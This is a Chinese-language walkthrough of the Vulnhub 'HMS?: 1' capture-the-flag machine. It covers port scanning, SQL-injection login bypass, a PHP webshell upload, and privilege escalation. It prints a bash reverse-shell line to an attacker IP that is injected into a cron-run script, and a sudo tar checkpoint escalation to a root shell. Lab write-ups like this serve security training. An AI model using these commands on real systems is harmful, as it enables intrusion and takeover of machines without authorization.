Vulnhub 靶场 HMS?: 1

前期准备:

靶机地址:https://www.vulnhub.com/entry/hms-1,728/

kali攻击机ip:192.168.11.129
靶机ip:192.168.11.200

一、信息收集

1.使用nmap对目标靶机进行扫描

Vulnhub 靶场 HMS?: 1

发现开放了21、22和7080端口。

2. 21端口

Vulnhub 靶场 HMS?: 1

里面什么也没有。

3. 7080端口

Vulnhub 靶场 HMS?: 1

看到一个表单,用弱密码检测了一番没什么结果,爆破了一会也没爆破出来。

二、漏洞利用

在 email 中测试一下是否有 sql 注入漏洞:

Vulnhub 靶场 HMS?: 1

不过前端页面会做检测,删掉再做一下验证:

Vulnhub 靶场 HMS?: 1

删掉 type 字段:

Vulnhub 靶场 HMS?: 1

登录:

Vulnhub 靶场 HMS?: 1

登陆成功了。查看网站内的信息:

Vulnhub 靶场 HMS?: 1

在主页源码中发现了文件上传的路径。

Vulnhub 靶场 HMS?: 1

并且还发现了一个 settings.php 页面,查看一下:

Vulnhub 靶场 HMS?: 1

发现可以上传文件,那就从 pentenstmonkey 复制了一个 webshell 上传并监听,上传成功后访问之前发现的文件上传目录:

Vulnhub 靶场 HMS?: 1

Vulnhub 靶场 HMS?: 1

nc 连接成功。写入交互式shell:

Vulnhub 靶场 HMS?: 1

三、提权

查看下有什么用户:

Vulnhub 靶场 HMS?: 1

发现有 eren 和 nivek 两个用户,查看一下可执行的文件:

Vulnhub 靶场 HMS?: 1

发现可以执行 /bin/bash,那就可以切换用户:

Vulnhub 靶场 HMS?: 1

成功切换到 eren 用户,查看权限也查看不了,不过在定时任务中有发现:

Vulnhub 靶场 HMS?: 1

Vulnhub 靶场 HMS?: 1

发现每隔五分钟运行一次,可以用它来提权,在 /home/eren/backup.sh 中写入 shell:

echo "bash -i >& /dev/tcp/192.168.11.129/1235 0>&1" >> backup.sh

Vulnhub 靶场 HMS?: 1

nc 监听:

Vulnhub 靶场 HMS?: 1

查看权限:

Vulnhub 靶场 HMS?: 1

发现以可以用 tar 进行提权:

Vulnhub 靶场 HMS?: 1

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Vulnhub 靶场 HMS?: 1

提权成功,查看 flag:

Vulnhub 靶场 HMS?: 1

上一篇:Vulnhub 靶场 MOMENTUM: 2


下一篇:Vulnhub-Narak靶场